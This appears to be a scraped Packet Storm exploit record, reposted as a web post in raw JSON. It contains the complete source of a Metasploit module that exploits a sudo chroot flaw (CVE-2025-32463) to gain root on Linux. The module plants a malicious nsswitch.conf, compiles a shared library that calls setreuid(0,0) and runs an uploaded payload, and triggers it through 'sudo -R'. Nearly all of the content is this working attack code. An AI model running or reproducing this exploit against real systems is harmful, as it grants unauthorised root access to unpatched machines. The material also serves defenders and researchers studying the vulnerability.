{“lastseen”:”2025-09-04T15:23:00″,”description”:”This Metasploit module exploits the chroot vulnerability…”,”published”:”2025-09-04T00:00:00″,”modified”:”2025-09-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sudo Chroot 1.9.17 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:209192″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32462″,”CVE-2025-32463″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = NormalRanking\\n \\n include Msf::Post::Linux::Priv\\n include Msf::Post::Linux::System\\n include Msf::Post::Linux::Compile\\n include Msf::Post::Linux::Packages\\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n \\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Sudo Chroot 1.9.17 Privilege Escalation’,\\n ‘Description’ =\\u003e %q{\\n Sudo before version 1.19.17p1 allows user to use `chroot` option, when\\n executing command. The option is intended to run a command with\\n user-selected root directory (if sudoers file allow it). Change in version\\n 1.9.14 allows resolving paths via `chroot` using user-specified root\\n directory when sudoers is still evaluating.\\n This allows the attacker to trick Sudo into loading arbitrary shared object,\\n thus resulting in a privilege escalation.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n \\n ‘Author’ =\\u003e [\\n ‘msutovsky-r7’, # module dev\\n ‘Stratascale’, # poc dev\\n ‘Rich Mirch’ # security research\\n ],\\n ‘Platform’ =\\u003e [ ‘linux’ ],\\n \\n ‘Arch’ =\\u003e [ ARCH_CMD ],\\n \\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n \\n ‘Targets’ =\\u003e [[ ‘Auto’, {} ]],\\n \\n ‘Privileged’ =\\u003e true,\\n \\n ‘References’ =\\u003e [\\n [ ‘EDB’, ‘52352’ ],\\n [ ‘URL’, ‘https:\/\/www.helpnetsecurity.com\/2025\/07\/01\/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463\/’],\\n [ ‘CVE’, ‘2025-32463’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-06-30’,\\n \\n ‘DefaultTarget’ =\\u003e 0,\\n \\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n \\n # force exploit is used to bypass the check command results\\n register_advanced_options [\\n OptString.new(‘WritableDir’, [ true, ‘A directory where we can write files’, ‘\/tmp’ ]),\\n ]\\n end\\n \\n # borrowed from exploits\/linux\/local\/sudo_baron_samedit.rb\\n def get_version\\n versions = {}\\n output = cmd_exec(‘sudo –version’)\\n if output\\n version = output.split(\\”\\\\n\\”).first.split(‘ ‘).last\\n versions[:sudo] = version if version =~ \/^\\\\d\/\\n end\\n versions[:sudo].gsub(\/p\/, ‘.’)\\n end\\n \\n def check\\n sudo_version = installed_package_version(‘sudo’) || get_version\\n \\n return CheckCode::Unknown(‘Could not identify the version of sudo.’) if sudo_version.blank?\\n \\n return CheckCode::Safe if !file?(‘\/etc\/nsswitch.conf’)\\n \\n return CheckCode::Appears(\\”Running version #{sudo_version}\\”) if Rex::Version.new(sudo_version).between?(Rex::Version.new(‘1.9.14’), Rex::Version.new(‘1.9.17’))\\n \\n CheckCode::Safe(\\”Sudo #{sudo_version} is not vulnerable\\”)\\n end\\n \\n def exploit\\n # Check if we’re already root\\n if !datastore[‘ForceExploit’] \\u0026\\u0026 is_root?\\n fail_with Failure::None, ‘Session already has root privileges. Set ForceExploit to override’\\n end\\n \\n # needs to compile in real-time to adjust payload execution path\\n fail_with Failure::NotFound, ‘Module needs to compile payload on target machine’ unless live_compile?\\n \\n payload_file = rand_text_alphanumeric(5..10)\\n \\n existing_shell = cmd_exec(‘echo $0 || echo ${SHELL}’)\\n \\n return Failure::NotFound, ‘Could not find shell’ unless file?(existing_shell)\\n \\n upload_and_chmodx(\\”#{datastore[‘WritableDir’]}\/#{payload_file}\\”, \\”#!#{existing_shell}\\\\n#{payload.encoded}\\”)\\n \\n register_files_for_cleanup(\\”#{datastore[‘WritableDir’]}\/#{payload_file}\\”)\\n \\n temp_dir = \\”#{datastore[‘WritableDir’]}\/#{rand_text_alphanumeric(5..10)}\\”\\n \\n base_dir = rand_text_alphanumeric(5..10)\\n \\n lib_filename = rand_text_alphanumeric(5..10)\\n \\n mkdir(temp_dir)\\n \\n cd(temp_dir)\\n \\n mkdir(base_dir.to_s)\\n \\n mkdir(\\”#{base_dir}\/etc\\”)\\n \\n mkdir(‘libnss_’)\\n \\n return Failure::PayloadFailed, ‘Failed to create malicious nsswitch.conf file’ unless write_file(\\”#{base_dir}\/etc\/nsswitch.conf\\”, \\”passwd: \/#{lib_filename}\\\\n\\”)\\n \\n return Failure::PayloadFailed, ‘Failed to copy \/etc\/group’ unless copy_file(‘\/etc\/group’, \\”#{base_dir}\/etc\/group\\”)\\n \\n exploit_code = %\\u003c\\n #include \\u003cunistd.h\\u003e\\n \\n __attribute__((constructor))\\n void exploit(void) {\\n setreuid(0,0);\\n execve(\\”#{datastore[‘WritableDir’]}\/#{payload_file}\\”,NULL,NULL);\\n \\n }\\u003e\\n \\n upload_and_compile(\\”#{temp_dir}\/libnss_\/#{lib_filename}.so.2\\”, exploit_code, \\”-shared -fPIC -Wl,-init,#{base_dir}\\”)\\n \\n cmd_exec(\\”sudo -R #{base_dir} #{base_dir}\\”)\\n \\n timeout = 30\\n print_status ‘Launching exploit…’\\n output = cmd_exec ‘command’, nil, timeout\\n output.each_line { |line| vprint_status line.chomp }\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/209192″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/209192\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-04T15:23:00″,”description”:”This Metasploit module exploits the chroot vulnerability…”,”published”:”2025-09-04T00:00:00″,”modified”:”2025-09-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sudo Chroot 1.9.17 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:209192″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32462″,”CVE-2025-32463″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-15845","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n